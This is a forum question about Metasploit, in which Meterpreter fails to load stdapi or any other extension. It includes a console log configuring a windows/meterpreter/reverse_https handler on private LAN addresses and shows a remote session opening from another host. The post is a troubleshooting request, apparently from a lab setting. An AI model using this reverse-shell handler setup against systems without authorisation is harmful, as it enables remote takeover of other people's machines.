# Meterpreter is failing to load any extension except the core commands

Tags: metasploit, meterpreter

```
[*] Starting persistent handler(s)...
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf5 exploit(multi/handler) > set LHOST 192.168.0.105
LHOST => 192.168.0.105
msf5 exploit(multi/handler) > set LPORT 8080
LPORT => 8080
msf5 exploit(multi/handler) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/handler) > 
[*] Started HTTPS reverse handler on https://192.168.0.105:8080
[*] https://192.168.0.105:8080 handling request from 192.168.0.101; (UUID: yfym4sqj) Staging x86 payload (180825 bytes) ...
[*] Meterpreter session 1 opened (192.168.0.105:8080 -> 192.168.0.101:63026) at 2019-04-10 22:16:45 -0400

msf5 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > help

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bg                        Alias for background
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel
    detach                    Detach the meterpreter session (for http/https)
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    get_timeouts              Get the current session timeout values
    guid                      Get the session GUID
    help                      Help menu
    info                      Displays information about a Post module
    irb                       Open an interactive Ruby shell on the current session
    load                      Load one or more meterpreter extensions
    machine_id                Get the MSF ID of the machine attached to the session
    migrate                   Migrate the server to another process
    pivot                     Manage pivot listeners
    pry                       Open the Pry debugger on the current session
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    sessions                  Quickly switch to another session
    set_timeouts              Set the current session timeout values
    sleep                     Force Meterpreter to go quiet, then re-establish session.
    ssl_verify                Modify the SSL certificate verification setting
    transport                 Change the current transport mechanism
    use                       Deprecated alias for "load"
    uuid                      Get the UUID for the current session
    write                     Writes data to a channel

meterpreter > load stdapi
Loading extension stdapi...
[-] Failed to load extension: No response was received to the core_enumextcmd request.
```

I am unable to load not only the stdapi but also all other extensions in meterpreter. If anybody can help I'd be thankful.

Comment: https://github.com/rapid7/metasploit-framework/issues/9371